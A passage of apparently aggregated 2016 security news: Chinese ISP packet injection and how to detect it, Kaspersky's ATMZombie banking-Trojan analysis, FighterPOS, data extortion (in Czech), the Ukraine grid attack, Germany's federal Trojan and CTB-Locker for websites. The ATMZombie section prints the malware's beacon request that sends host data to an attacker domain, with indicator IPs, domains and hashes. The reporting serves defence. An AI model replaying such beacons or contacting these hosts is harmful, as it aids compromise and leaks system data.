In the Out of Band TCP Injection, the network operators send a forged packet without dropping the legitimate ones, this means that the ISP clones the legitimate traffic and send both legitimate and cloned traffic to the final destination.

The destination receives two traffic stream coming from the same source, the legit and the cloned one, but only one can arrive first, if the legit one wins the race nothing will happen and the users will be fine, but if the cloned one wins the race the user will be in serious problems.

The HTTP Injection works injecting false HTTP responses into the web client. The HTTP is a stateless client-server protocol that uses TCP as its transport.

An HTTP exchange begins by a client sending an HTTP request, usually to retrieve a resource indicated by a URI included in the request. After processing the request, the server sends an HTTP response with a status code. The user might get the following responses:

200 (Successful): The request was successfully received, understood, and accepted. Responses of this type will usually contain the requested resource.
302 (Redirection): The requested resource resides temporarily under a different URI. Responses of this type include a Location header field containing the different URI.
“An HTTP client will receive only one HTTP response for a given request even when a false HTTP response is injected because, as mentioned above, the TCP layer will only accept the first segment that it receive.”

The researchers collected evidence to discover the threat actor behind the forged packets.

They discovered a sort of dirty alliance between advertising sites and ISPs that working together can generate huge amounts of advertisement revenue and divide the profit.

During the investigation, the researchers detected massive amounts of traffic being redirected based on this partnership.

Even though this is happening in China, all users in the world can be affected by it, simply because if you want to access to websites hosted in China you will need to pass through Chinese ISPs before arriving the website, and you will have your traffic susceptible to be injected with ads or malware.

Chinese ISPs inject malware ads 3

Chinese ISPs inject malware ads 4

How to detect traffic changed/cloned by the Chinese ISPs?

IP identification

A forged packet is masqueraded as a legit packet but can be discovered by the time stamp in each packet, providing an evidence of being a rogue packet.

“We formulate the following rule to determine which of the two raced packets is the forged one: the forged packet is the one that has the largest absolute difference between its identification value and the average of the identification values of all the other packets (except the raced one).”

TTL (Total Time to Live)

“The IP TTL value in a received packet is dependent on the initial value set by the sender and the number of hops the packet has traversed so far. Thus, it is unusual for packets of the same session to arrive at the client with different TTL values. Therefore, if the raced packets have different TTL values we can use them to distinguish between the two packets. From our observations, the injecting entity often made no attempt to make the TTL value of the forged packet similar to the TTL values of the other packets sent by the server. Similarly to the case of the IP identification rule above, we identify the forged packet using the following rule: the forged packet is the one that has the largest absolute difference between its TTL value and the average of TTL values of all the other packets. (except the raced one).”

Timing Analysis

“The race between the forged and legitimate packets can also be characterized by the difference in their arrival times. By arrival time we mean the time at which the packet was captured by the monitoring system. Since the system captures traffic at the entrance to the edge network close to the client, it is reasonable to assume that these times are very close to the actual arrival times at the end client. For each injection event we calculatethe difference between the arrival time of the legitimate packet and the arrival time of the forged packet. A negative difference means that the forged packet “won” the race, and a positive difference means that the legitimate packet “won”.”

How to mitigate the risk?

The best way to avoid this kind of attacks is to access websites supporting HTTPS, because in generally the malicious URLs are not SSL Shield, therefore the use of HTTPS by a website can block this type of attack.


ATMZombie: banking trojan in Israeli waters
29.2.2016 Zdroj: Kaspersky Virus

On November 2015, Kaspersky Lab researchers identified ATMZombie, a banking Trojan that is considered to be the first malware to ever steal money from Israeli banks. It uses insidious injection and other sophisticated and stealthy methods. The first method, dubbed “proxy-changing”, is commonly used for HTTP packets inspections. It involves modifying browser proxy configurations and capturing traffic between a client and a server, acting as Man-In-The-Middle.

Although this is efficient for testing, streaming bank details isn’t as easy. Banks are using encrypted channels, signed with authorized certificates, to prevent the data from being streamed in clear-text. The attackers, however, realized the missing piece and have since issued a certificate of their own, which is embedded in the dropper and is inserted in the root CA list of common browsers in the victim’s machine.

The method of using a “proxy-changer” Trojan to steal bank credentials has been around since the end of 2005, and is being actively used by Brazilian cybercriminals; however, it wasn’t until 2012 that Kaspersky Lab researchers compiled a full attack analysis. “In Brazil malicious PAC files in Trojan bankers have been increasingly common since 2009, when several families such as Trojan.Win32.ProxyChanger started to force the URLs of PAC files in the browser of infected machines.“, said Fabio Assolini, Senior Security Researcher at GReAT Kaspersky Lab, in his article.

 

A Kaspersky Lab researcher based in Russia had written about similar Trojan attacking PSB-retail customers, dubbed Tochechnyj Banker. It was even backed by a victim case study, where the victim explains how the crocks fooled him into handing out his credentials.

The incident Israeli banks experienced had the same characteristics, but had a very fascinating and innovative method of stealing the money. Instead of relying only on direct wire-transfer or trading credentials, their modus operandi started by leveraging a loophole in one of the bank’s online features; and later by physically withdrawing money from the ATM, assisting money mules (zombies) who are suspected to have no awareness of how the attack works; hence the Trojan was dubbed – ATMZombie.

 

The threat actor seems to be widely active in banking malware campaigns, as he was found to be registering domains for the following Trojans as well: Corebot, Pkybot and the recent AndroidLocker. However, none uses the same modus operandi. In addition, the actor is being tracked by a number of researchers and also runs rogue online services such as malware encryption and credit card dumps for sale.

Similar to the PSB-retail attack in 2012, the Retefe Banking Trojan, discovered by PaloAlto Networks last August, is quite like a big brother of ATMZombie. It contains an additional Smoke Loader backdoor, which ATMZombie lacks. The other similar banker is that identified by IBM Trusteer’s as Tsukuba.

The proxy configurations file must specifically detail the targets it is aiming at, thus it was fairly easy to spot them. The attack had successfully compromised hundreds of victim machines; however Kaspersky Lab was able to trace only a couple of dozen of them.

Bird view

The Trojan is dropped into the victim machine and starts the unpacking process. Once unpacked it stores certificates in common browsers (Opera, Firefox) and modifies their configurations to match a Man-In-The-Middle attack. It eliminates all possible proxies other than the malware’s and changes cache permissions to read-only. It than continues by changing registry entries with Base64 encoded strings that contain a path to the auto-configuration content (i.e. traffic capture conditions using CAP file syntax) and installs its own signed certificate into the root folder. Later it waits for the victim to login to their bank account and steals their credentials, logs in using their name and exploits the SMS feature to send money to the

Analysis

After loading the malware executable with your favorite assembler level analysis debugger, it is possible to capture the virtual allocation procedure occurring in run-time. Putting breakpoints in the right instruction points will disclose the unpacked executable. Once the final routine is done, the MZ header will appear in memory. There are many techniques and tools, but this method was enough to unpack the malware.

 

Looking into the malware assembly code, we were able to identify a number of strings that were embedded in the data section for a reason. The first we spotted was a Base64 string containing a chunk of an outbound communication URL, meant to be embedded in a number of registry entries.

 

The string decodes to:

http://retsback.com/config/cfg.pac

Side note: It is not the PAC file that is being embedded in the browser network configuration; thus we believe that it was generated by the attacker as a backup, in case the original PAC fails.

 

Two other Base64 strings we found were the PAC, which was embedded in the browser network configuration; and another type of URL, which indicated the type of lateral movement the threat actor chose.

 

The URL in the Base64 string was appended to an HTTP request which was detected as an attempt to fingerprint the sandbox. The empty parameters are fed with the Windows ProductID, the binary’s name and an integer between one and five. The integer is the level of integrity that the malware was assigned for; where (1) is untrusted level and (5) is system level. Along with those three dynamic values is a static version value.

GET
/z/rtback.php?id=[WindowsProductID]&ver=0000002&name=[malware_filename]&ilvl=[integrity_level] HTTP/1.1
Host: retsback.com
Cache-Control: no-cache

Inspecting the binary, we found that it uses a certificate to stream data over HTTPS and securely steal the victim’s credentials.

 

After embedding the above certificate and proxy configurations in the victim’s machine, the browser is set to route the communication via the attackers’ server when the victim decides to login to his bank.

The victim was not only lured into downloading the malware for being a client of Israeli banks, but was also targeted for being a client of a specific bank in Israel. This requires either very good intelligence-gathering techniques or an insider that can, legitimately or not, get a hold of the list of clients. When a list of that nature is being assembled, the hunt becomes very efficient and the attackers are able to craft each email or link to a specific victim or bank.

The following is a full pseudo code of the malware:

 

Stepping out of the rabbit hole

The malware is only the first step of the attack. The second step involves a manual login to the hijacked accounts and submission of a wire-transfer to the account of the money mule. This is a crucial step, since crossing this step means that the malware has successfully finished its role in the attack.

Logging manually into the victim’s bank account is not something to take lightly. Many banks around the world are fingerprinting devices to make sure that the user is logging in from a trusted machine. For untrusted machines, the bank will issue extended protection mechanisms to prevent the exact attack detailed in this article. In addition, banks track anomalies and send alerts to its information security personnel.

 

Before victims get to the phase where they call the bank’s support team to declare that money has gone missing, the attacker issues a money transfer to the money mule’s cell phone number and Israeli Personal Identifiable Information (PII). We dubbed the money mule “Zombie”, as part of an investigation in which he found that youngsters were lured into withdrawing cash from the ATMs, in return for receiving a small amount of it. Later, they sent the rest of the money via different media, such as a post office. The campaign was named after the money mules and the technique they were instructed to use.

The technique allowed the attackers to stay anonymous and supervise the entire campaign remotely. It also points to a new type of attack, where attackers control residents of a country to operate as an insider and deliver a basic service. This service might cause its executor to be accused for committing a crime; however, the chance of proving that they were aware of the entire operation is close to none. After all, they are not doing anything malicious.

From reading the bank’s instruction, a non-registered user can study the five-year old feature and analyze the possibility of including it in the attack as a way to wire money. This feature is called “SMS transaction”; and it has been widely used for the past few years, allowing parents, for example, to send money to kids who have no credit card, while they serve in the military or study at school.

Along with a few more unique details, such as Date, Israeli ID, Name and Amount the owner of the phone will be provided with an SMS message that authorizes the cash withdraw.

Kaspersky Lab found an innovative way to protect against the proxy-changer that has existed for several years. It can be found here.

Israeli banks involved in the incident successfully stopped the attack using, among other data, the information they received from Kaspersky Lab regarding the attacker, the malicious activity and the victims.

FAQs

Q: Was the attack targeted at Israeli banks?

A: Yes

Q: Was money stolen from the banks or from victims’ accounts?

A: The money was stolen from victims’ accounts, but the bank compensated each victim. In conclusion, the bank was the one to lose revenue.

Q: Was the attack stopped completely?

A: As far as we know, the banks were able to stop the attack completely and compensate the victims.

Q: How many victims were in the attack?

A: The Kaspersky Security Network (KSN) showed dozens of victims; however, we estimate that the total number of victims reached a couple of hundreds.

Q: How much money was stolen?

A: The highest amount for one transaction was approximately 750$. We were able to find a number of money mules, about 10 different malicious binaries, and a number of banks who were victims of this attack. With this information we estimate that hundreds of thousands of dollars were stolen in this short period of time. If not for the vast investigation led, among others, by Kaspersky Lab, the amounts stolen could have soared to much larger numbers.

Q: Were the police part of the investigation?

A: We are not aware of any investigation details.

Q: In regards to attribution, who is the attacker?

A: Kaspersky Lab does not seek attribution; however, the company’s researchers have sent all the information to law enforcement to help in catching the criminals behind the campaign.

Q: What can I do to stay protected?

A: Make sure you have anti-malware product installed and install the latest patches.

IPs

91.230.211.206
185.86.77.153
91.215.154.90
88.214.236.121

Domains

retsback.com
updconfs.com
systruster.com
msupdcheck.com

Samples

6d11090c78e6621c21836c98808ff0f4 Trojan-Banker.Win32.Capper.zym
4c5b7a8187475be251d05655edcaccbe Trojan-Banker.Win32.Capper.zyt
c0201ab2a45bc0e17ebd186059d5a59e Trojan-Banker.Win32.Capper.zyk
47b316e3227d618089eb1625c4202142 Trojan-Banker.Win32.Capper.zyl
84bb5a77e28b3539a8022bc3612d4f4c PAC file example
d2bf165284ab1953a96dfa7b642637a8 Trojan-Banker.Win32.Capper.zyp
80440e78a68583b180ad4d3e9a676a6e Trojan-Banker.Win32.Capper.zyq
d08e51f8187df278296a8c4ff5cff0de Trojan-Banker.Win32.Capper.zyg
efa5ea2c511b08d0f8259a10a49b27ad Trojan-Banker.Win32.Capper.zys
13d9352a27b626e501f5889bfd614b34 Trojan-Banker.Win32.Capper.zyf
e5b7fd7eed59340027625ac39bae7c81 Trojan-Banker.Win32.Capper.zyj


The new FighterPOS PoS Malware implements worm capabilities
29.2.2016 Virus

The threat actors behind the FighterPOS PoS malware have added worm capabilities to their malicious code that is now targeting systems in the United States.
PoS malware represents a serious threat to several industries, from retail to the hotel industry. During the last twelve months, security experts have discovered a significant number of payment card frauds involving the PoS malware. PoS malware is a very effective weapon in the arsenal of cyber criminals;

In April 2015, security experts at Trend Micro discovered a new family of PoS malware, dubbed FighterPOS, that infected the systems of more than 100 organizations in Brazil allowing crooks to steal more than 22,000 unique credit card records.

FighterPOS was offered for sale for more than $5,000 worth of Bitcoins, it is now spreading also outside the Brazil, researchers at TrendMicro reported that the number of infections in the US now represents 6 percent of the total, up from 1 percent reported in April 2015.

fighterpos infections

Cyber criminals have started targeting the United States, the researchers detected new samples of the FighterPOS malware that include strings written in English, instead of Portuguese used in Brazil.

“It is also interesting to note that based on the analysis of their code, the new FighterPOS samples have strings of code written in English, instead of Portuguese. This leads us to speculate that whoever is behind the new versions are operating in English-speaking countries, and are shifting to target other countries like the United States. ” states the analysis published by TrendMicro.

The malware researchers discovered two new strains of the FighterPOS malware called TSPY_POSFIGHT.F and WORM_POSFIGHT.SMFLK. The WORM_POSFIGHT.SMFLK, also known as “Floki Intruder,” in more sophisticated respect the TSPY_POSFIGHT.F, it has the ability to the firewall, User Account Control (UAC) and other Windows protections and it is able to detect the presence of security products using Windows Management Instrumentation (WMI).

The lightweight FighterPOS variant, the TSPY_POSFIGHT.F, doesn’t act as a backdoor and is not able to receive commands. It has been designed to send back to C&C the payment card logs collected by other PoS malware.

The Floki Intruder is spread through websites compromised by attackers, it could be updated receiving packages from the command and control (C&C) servers.

The most interesting improvement for the new strain of the FighterPOS malware is the implementations of worm capabilities. The Floki Intruder variant is able to locate other PoS systems on the same network and infect them. The malware enumerates logical drives and drops copies of itself along with

The malware enumerates logical drives and drops copies of itself and an autorun.inf file using the WMI. The autorun.inf allows the execution of the malware when the logical drive is accessed.

fighterpos autorun

“Perhaps the most notable update Floki Intruder has from FighterPOS is that it is able to enumerate logical drives to drop copies of itself and an autorun.inf by using WMI. Adding this routine, in a way, makes sense: given that it is quite common for PoS terminals to be connected in one network, a propagation routine will not only enable the attacker to infect as many terminals as possible with the least amount of effort, it will also make this threat more difficult to remove because reinfection will occur as long as at least one terminal is affected.” states the analysis.


Za ukradená data platí oběti hackerů i miliony dolarů

29.2.2016 Hacking
Pokud by citlivá data firem unikla na internet, mohlo by je to snadno zničit. V minulém roce se mohutně rozšířil nový, znepokojivý trend u kyberútoků: vydírání.

Jen za poslední rok zaplatily některé společnosti přes milion dolarů jako úplatek za mlčení. Kyberútočníci si navykli ukrást citlivá data a hrozit, že je zveřejní online v případě nezaplacení, říká Charles Carmakal, viceprezident skupiny Mandiant, spadající pod protimalwarovou bezpečnostní firmu FireEye.

„Jsme svědky situace, kdy si zloděj úmyslně vybere konkrétní společnost, ukradne její data, zkontroluje je a zná jejich hodnotu,“ pokračuje Carmakal. „Viděli jsme sedmimístné platby od firem, které se bojí uveřejnění svých citlivých údajů.“

Skupina Mandiant ve čtvrteční zprávě zběžně popsala praktiky útočníků, s tím, že manažeři firem jsou někdy hackery dokonce zesměšňováni.

Vydírací útoky jsou ještě sofistikovanější než tzv. ransomware, jako je např. Ctryptolocker: Malware, který zašifruje soubory v počítači a pro jejich zpřístupnění musí majitel zaplatit danou cenu v bitcoinech.

Ač ransomware útoky mohou být zdrcující ve své přímočarosti, obvykle je nutno zaplatit „pouze“ několik stovek dolarů. I tak se ovšem několikrát povedlo hackerům získat vyšší částky.

Součásné vyděračské útoky jsou však mnohem propracovanější a mohou být velice nebezpečné, obzvláště pro velké firmy. Carmakal soudí, že pokud by hackeři zveřejnili některé z ukradených dat, mohli by společnost zcela vyřadit ze hry.

„Realita je, že hodně lidí zaplatí,“ říká.

Pro skupinu jako Mandiant, která zkoumala velké úniky dat u společností jako Target, Home Depot nebo Anthem, může být dost těžké firmám poradit, co v dané situaci udělat, pokračuje Carmakal.

Útočníci často nedávají dostatek času, aby se ověřilo, jestli hackeři blafují, nebo ne. A jsou tací, kteří ve skutečnosti daná data nemají a jen takto shání peníze.

„Co potřebujeme je důkaz, že někdo skutečně má přístup k těm datům,“ říká Carmakal. „Přesvědčíme je, aby nám poslali vzorek, nebo provedeme co nejrychlejší možné vyšetřování.“

Pokud skupina odhalí, že někdo skutečně slídil okolo a s největší pravděpodobností data má, přichází velice těžké a složité rozhodnutí: Protože i když firma zaplatí, nikdo negarantuje, že útočníci přesto data nevypustí do světa.

„Rozhodně existuje riziko v nezaplacení, ovšem stejně tak riziko v zaplacení,“ dodává Carmakal. „Cíl každého je, že firma zaplatí a útočníci smažou ukradená data; ale to, že tak skutečně učinili, vám nikdo nepotvrdí.“


A journalist has been hacked on a plane while writing an Apple-FBI story

29.2.2016 Apple

The journalist Steven Petrow had his computer hacked while on a plane, it was a shocking experience that raises the discussion on privacy.
Experts in the aviation industry are spending a significant effort in the attempt of improving cyber security. The news that I’m going to tell you has something of incredible.

The American journalist and author Steven Petrow, who is now writing for USA Today explained that he was contacted by a fellow passenger on an American Airline flight from North Carolina to Dallas, who told him that he accessed his email account.

American-Airlines privacy hacking

“I don’t really need to worry about online privacy,” wrote Petrow. “I’ve got nothing to hide. And who would want to know what I’m up to, anyway?

Petrow is a journalist, not an investigative reporter and is not involved in any specific investigation, so the interest of the alleged hacker appeared very strange to him.

Petrow was writing an article on the “Apple vs FBI” case while he was on the plane, but another passenger was well informed about the work of the journalist.

After the plane landed, the journalist was leaving the plane when a fellow in the same row asked to speak with him.

“I need to talk to you.” the man said. “You’re a reporter, right?” “Wait for me at the gate.”

The journalist waited for the fellow passenger and when met him at the gate asked to explain.

“How did you know I was a reporter?” the journalists asked.

“Are you interested in the Apple/FBI story?” replied the man ignoring the question,

“I hacked your email on the plane and read everything you sent and received. I did it to most people on the flight.”

As a proof of the hack, the fellow passenger cited the exact content of one the mail he received while in flight.

“One of my emails was pretty explicit about the focus of my story and I had emailed Bruce Schneier, a security expert who had previously written in the Washington Post about this very issue.” wrote Petrow.

During the flight, Petrow worked on the article and sent and received several email messages through the American Airlines Gogo in-flight Internet connection.

The Gogo wireless is American Airlines free internet service provided to passengers. When passengers use it are advised to avoid transmitting sensitive data, but most of the passengers still ignore the risks.

The Gogo service operates in the same ways as most open Wi-Fi hotspots, this means that is important avoid sharing sensitive data while accessing it. on the ground.

Gogo recommends the use of a virtual private network for sending sensitive data, but of course, the journalist ignored this best practice.

The fellow passenger explained the journalist the risks for connecting to open networks.

“That’s how I know you’re interested in the Apple story,” he continued. “Imagine if you had been doing a financial transaction. What if you were making a date to see a whore?”

“That’s why this story is so important to everyone,” he told Petrow. “It’s about everyone’s privacy.”

The man then went away, but the event upset the reporter. His privacy had been violated, the same that happens every day to millions of unaware users.s

“For me, I felt as though the stranger on the plane had robbed me of my privacy—as was explicitly his intent. He took the decision of what to share out of my hands. He went in through the back door of the Gogo connection.


A DHS report confirms the use of BlackEnergy in the Ukrainian outage, still unknown its role
28.2.2016 Hacking

A report issued by the DHS CERT confirms that the outage in Ukraine was caused by a well-coordinated attack still unclear the BlackEnergy role.
In December, a major outage hit a region in Ukraine, more than 225,000 customers were affected by the interruption of the electricity. Security experts speculate the involvement of Russian nation-state actors that have used the BlackEnergy to infect SCADA systems of Ukrainian grid and critical infrastrcuture.

According to a Ukrainian media TSN, the power outage was caused by the destructive malware that disconnected electrical substations. The experts speculate that hackers run a spear phishing campaign across the Ukrainian power authorities to spread the BlackEnergy malware leveraging on Microsoft Office documents.

Now a new report published by the DHS Industrial Control Systems Cyber Emergency Response Team confirms that the outage was caused by a cyber attack.

The report is based on interviews with operations and IT staff at six Ukrainian organizations involved in the attacks. The thesis has been supported first by the SANS industrial control systems team, but it is still unclear the real impact of the BlackEnergy malware of the incident.

The SANS report reported that attackers flooded the call centers at the power authorities with phone calls, the intent of the attackers was to prevent customers from reporting the incident to the companies operating the critical infrastructure.

The DHS report highlights the possibility that the two strains of malware were used by the attackers after the outage in an attempt either to destroy evidence the intrusion or make recovery more difficult.

“Following these discussions and interviews, the team assesses that the outages experienced on December 23, 2015, were caused by external cyber-attackers. The team was not able to independently review technical evidence of the cyber-attack; however, a significant number of independent reports from the team’s interviews as well as documentary findings corroborate the events as outlined below.” states the report.

“Through interviews with impacted entities, the team learned that power outages were caused by remote cyber intrusions at three regional electric power distribution companies (Oblenergos) impacting approximately 225,000 customers.”

“The cyber-attack was reportedly synchronized and coordinated, probably following extensive reconnaissance of the victim networks. According to company personnel, the cyber-attacks at each company occurred within 30 minutes of each other and impacted multiple central and regional facilities. During the cyber-attacks, malicious remote operation of the breakers was conducted by multiple external humans using either existing remote administration tools at the operating system level or remote industrial control system (ICS) client software via virtual private network (VPN) connections. The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access.

All three companies indicated that the actors wiped some systems by executing the KillDisk malware at the conclusion of the cyber-attack. The KillDisk malware erases selected files on target systems and corrupts the master boot record, rendering systems inoperable. It was further reported that in at least one instance, Windows-based human-machine interfaces (HMIs) embedded in remote terminal units were also overwritten with KillDisk. The actors also rendered Serial-to-Ethernet devices at substations inoperable by corrupting their firmware. In addition, the actors reportedly scheduled disconnects for server Uninterruptable Power Supplies (UPS) via the UPS remote management interface. The team assesses that these actions were done in an attempt to interfere with expected restoration efforts.”

The report confirmed that every company victim of the attack was infected with the BlackEnergy malware, but avoided to provide further details on the role played by the malware.

“Each company also reported that they had been infected with BlackEnergy malware; however, we do not know whether the malware played a role in the cyber-attacks. The malware was reportedly delivered via spear phishing emails with malicious Microsoft Office attachments. It is suspected that BlackEnergy may have been used as an initial access vector to acquire legitimate credentials; however, this information is still being evaluated. It is important to underscore that any remote access Trojan could have been used and none of BlackEnergy’s specific capabilities were reportedly leveraged.”


German authorities approve the use of home-made Federal Trojan
28.2.2016 Virus

The German Interior Ministry has approved the use of a federal Trojan developed by the German Federal Criminal Police.
The German Interior Ministry has approved the use a spyware developed by the German Federal Criminal Police, aka the ‘federal Trojan’ or Bundestrojaner, for the investigative purpose.

“Soon the state could re-enter the computer of suspicious citizens. The Bundeskriminalamt has had to develop their own Trojan horse that should receive the application approval in the coming weeks, as the Germany radio has been confirmed. The Chaos Computer Club and Green remain skeptical whether the new software meets the requirements of the Federal Constitutional Court.” reports the Deutschlandfunk.

The German Federal Criminal Police completed the development of the malware in autumn 2015, it allows investigators to spy on suspects’ phone calls, emails, chats, and access files and sensitive data stored on the mobile devices. The federal Trojan is also able to record video or audio from the surrounding environment.

The authorities can now use the federal Trojan under a court order, the spyware could be used in any investigation on individuals involved in a crime threatening citizens’ “life, limb or liberty.”

Experts from the German Chaos Computer Club (CCC) expressed their concern for the Federal Trojan, Frank Rieger, a spokesman for the organizations, highlights the abilities of the malware of setting up a video or audio surveillance.

In 2011, the experts at Chaos Computer Club analyzed another sample of the Federal Trojan. The experts discovered that the spyware had the ability to set up a backdoor on the suspect’s machine and spy on surround environment via camera and microphone. The ministers of several German states admitted the use of the malware and explained that the malware analyzed by the CCC was a beta version of a spyware created by the German firm DigiTask. The spyware was rejected by authorities because it implemented many surveillance operations instead the only telecommunication surveillance.

The experts at CCC speculates that the so-called Federal Trojan is dangerous for citizens, in fact, it could be easy that also innocent users fall victims of the surveillance activities operated by the authorities.

Another aspect highlighted by privacy advocates is the way such kind of malware is developed, the authors of the spyware need to access zero-day exploit to compromise suspects’ devices, but this implies that authorities will not share such knowledge within the IT community putting citizens at risk.

The Deutschlandfunk also confirmed that German police also use other spyware, including the infamous FinFisher malware developed by Gamma International.

“The Bundeskriminalamt had a software ordered parallel to the self-development even in a controversial company to source telecommunication surveillance. According to the BKA, the adaptation of the product is FinFisher the German-British company Elaman / Gamma International is not yet complete, however, is to be promoted following the own development.” states Deutschlandfunk.


Chinese ISPs Caught Injecting Ads and Malware into Web Pages
27.2.2016 Virus
China has gained a considerable global attention when it comes to their Internet policies in the past years; whether it's introducing its own search engine dubbed "Baidu," Great Firewall of China, its homebrew China Operating System (COP) and many more.
Along with the developments, China has long been criticized for suspected backdoors in its products: Xiaomi and Star N9500 smartphones are top examples.
Now, Chinese Internet Service Providers (ISPs) have been caught red-handed for injecting Advertisements as well as Malware through their network traffic.
Three Israeli researchers uncovered that the major Chinese-based ISPs named China Telecom and China Unicom, two of Asia's largest network operators, have been engaged in an illegal practice of content injection in network traffic.
Chinese ISPs had set up many proxy servers to pollute the client's network traffic not only with insignificant advertisements but also malware links, in some cases, inside the websites they visit.
If an Internet user tries to access a domain that resides under these Chinese ISPs, the forged packet redirects the user's browser to parse the rogue network routes. As a result, the client's legitimate traffic will be redirected to malicious sites/ads, benefiting the ISPs.
Here's How Malware and Ads are Injected
In the research paper titled 'Website-Targeted False Content Injection by Network Operators,' the Israeli researchers wrote that the tactic has now expanded to core ISPs – the Internet companies that interconnect edge ISPs with the rest of the ISPs globally.
These ISPs have set up specialized servers that monitor network traffic for specific URLs and move to alter it, no matter the end users are their customers or not.
Methods of Injection:
Various methods had been adopted by ISPs to infiltrate the legitimate traffic. Some of them are:
1- Out of Band TCP Injection
Unlike in the past when ISPs modified network packages to inject ads, the network operators send the forged packets without dropping the legitimate ones.
Interestingly, instead of interception or rewriting of network packets, cloning of HTTP response packets had been adopted by ISPs to replicate the infection. The ISP clones the legitimate traffic, modifies the clone, and then sends both packets to the desired destination.
So ultimately, there are 2 packet responses generated for a single request. Hence, there is a chance of forged packet to win the race, while legit packet reaches at last.
Since the cloned traffic will not always arrive at the end users before the legitimate one, the injected traffic is harder to detect.
But a serious analysis with netsniff-ng would knock out the fake packets.
2) HTTP Injection
HTTP is a stateless client-server protocol that uses TCP as its transport. As TCP only accepts the initial packet upon its receival and discards the second, there is a chance to receive the fake packet in first place; if infection had been taken place.
Here, the user might get a response with HTTP Status Number 302 (Redirection) instead of HTTP Status Number 200 (OK) and would be re-routed to the other non-legit links.
How to Identify Rogue Packets?
1) IP Identification
IP identification value does contains a counter that is sequentially incremented after each sent the packet.
The forged packet returns soon after making a request that masquerades as a legit packet. But the time stamp in each packet would provide enough evidence to eliminate the rogue packet.
The forged packet is the one that has the largest absolute difference between its identification value and the average of the identification values of all the other packets
2) TTL (Total Time to Live)
Each received packet contains an initial value set by sender that calculates the number of hops covered by the packet during the transmission.
If packet is received with different number of hop counts, then it would clearly draws a line between the legit and illegit ones.
The forged packet is the one that has the largest absolute difference between its TTL value and the average of TTL values of all the other packets
3) Timing Analysis
Time stamp in the packet captured by the monitoring systems at the entrance to the Edge network would figure out the genuinity.
The data packet with apparent time close proximity would differentiate the legitimate packets from the forged packets with unmatched arrival time.
List of the Infection Groups
Chinese ISPs Caught Injecting Ads and Malware into Web Pages

In general, 14 different ISPs had been discovered with malicious background, and out of these 10 are from China, 2 from malaysia, and 1 each from India and United States.
Following are the injection groups and their characteristics:
1. Hao – Referred the user to hao123.com itself, but using an HTTP 302 response mechanism to infect users.
2. GPWA – The genuine website of Gambling had been forged to another web domain which intelligently redirects the traffic to 'qpwa' (sometimes, public would not find the difference between 'q' and 'g').
The forged content here includes a JavaScript that refers to a resource having the same name as the one originally requested by the user, but the forged resource is located at qpwa.org registered to a Romanian citizen.
3. Duba Group – The injections in this group add to the original content of a website a colorful button that prompts the victim to download an executable from a link at the domain duba.net.
The executable is flagged as malicious by several antivirus vendors.
4. Mi-img – In these injected sessions, the client, which appears to be an Android device, tries to download an application. The redirected response navigates into an online bot database that had been identified by a BotScout lookup.
5. Server Erased – In this group, the injections were identical to the legitimate response but the original value of the HTTP header 'Server' is changed.
Motive Behind the Attack
Both the advertising agencies and the ISPs are benefited by redirecting user's traffic to the corresponding sites.
This practice would mark an increase in advertisement revenue and other profits to advertisers and ISPs.
During their research, the researchers logged massive amounts of Web traffic and detected around 400 injection incidents based on this technique.
Most of these events happened with ISPs in China and far east countries, even if the traffic originated from Western countries, meaning a German user accessing a website hosted in China is also susceptible to having his/her traffic injected with ads or malware.
How to Mitigate?
Since the companies that engage in such practices are edge ISPs - the final network providers that connect users to the Internet, users can change their Internet provider.
However, the simplest way to combat this issue is for website operators to support HTTPS for their services, as all the websites that infect users are SSL-less.
The sites that supply malicious URLs are not guarded by SSL Shield, making them vulnerable to carry out the illegit things.
Therefore, usage of HTTPS-based websites would block such kinds of attacks, so users are advised only to stick to SSL sites.
Delivering the illegit content, or redirecting the crowd to stash the cash would end up losing the public trust on the technologies.


CTB-Locker Ransomware Spreading Rapidly, Infects Thousands of Web Servers
27.2.2016 Virus
In last few years, we saw an innumerable rise in ransomware threats ranging from Cryptowall to Locky ransomware discovered last week.
Now, another genre of ransomware had been branched out from the family of CTB-Locker Ransomware with an update to infect "Websites".
The newly transformed ransomware dubbed "CTB-Locker for Websites" exclusively hijacks the websites by locking out its data, which would only be decrypted after making a payment of 0.4 BTC.
This seems to be the very first time when any ransomware has actually defaced a website in an attempt to convince its administrator to comply with the ransom demand.
However, the infected website admins can unlock any 2 files by the random generator for free as a proof of decryption key works.
Here's How CTB-Locker for Websites Ransomware Works
The CTB-Locker ransomware replaces the index page (the original index.php or index.html) of the servers hosting websites with the attacker's defacement page (a new affected index.php).
The defacement page serves a message informing the site owners that their files have been encrypted, and they need to pay a ransom before a certain deadline.
Once encrypted, the compromised websites display the following message:
"Your scripts, documents, photos, databases and other important files have been encrypted with strongest encryption algorithm AES-256 and unique key, generated for this site."
The message also contains a step-by-step guide that helps the CTB-Locker victims to make the payment to a specific Bitcoin address.
FREE Key to Decrypt Any 2 Random Files
Soon after gaining the website control, the ransomware attacker submits two different AES-256 decryption keys to the affected index.php.
The first key would be used to decrypt any 2 random files from the locked files for free under the name of "test" which are chosen to demonstrate the decryption procedure.
Once the site administrator enters the filename and hit "Decrypt for Free," jquery would be fired up upon the request to test the decryption key in a C&C Server. When the key is received, it'll decrypt any 2 random files and display 'Congratulations! TEST FILES WAS DECRYPTED!!'
The other decryption key would be the one to decrypt rest of the seized files, after making the payment in Bitcoin to the attacker.
All the website's content would be encrypted using an AES-256 algorithm, and a unique ID would be generated for each infected website.
Nearly all possible types of files extensions are being affected by CTB-Locker Ransomware.
Live Session with Ransomware Attackers
Another unique characteristic of the ransomware is giving victims the ability to exchange messages with the ransomware attackers.
The ransomware developers have organized a chat room in such a way that the victims could talk with the ransomware creators after the specifying name of the secret file which is present in the same directory with index.php.
CTB Locker for Website → Modifies Packages in the Server
The CTB-Locker for Website package utilizes a variety of files described below:
index.php : The Main component of CTB-Locker for Websites and contains the encryption and decryption routines as well as the payment page.
allenc.txt : Contains a list of all encrypted files.
test.txt : Contains the path and filenames to two prechosen files that can be decrypted for free.
victims.txt : It contains a list of all files that are to be encrypted. However, the files that are already encrypted will remain in this list.
extensions.txt - The list of file extensions that should be encrypted.
secret_[site_specific_string] : The secret file used by the Free Decrypt and Chat functions and is located in the same folder as the index.php file.
Command and Control Server Location:
According to Benkow Wokned (@benkow_), a security researcher who discovered CTB-Locker for Website, found that the index.php page utilizes the jQuery.post() function to communicate and POST data to the Ransomware's Command and Control (C&C) servers.
Currently, there are three Command and Control servers for CTB-Locker for Websites uncovered by the researchers:
http://erdeni.ru/access.php
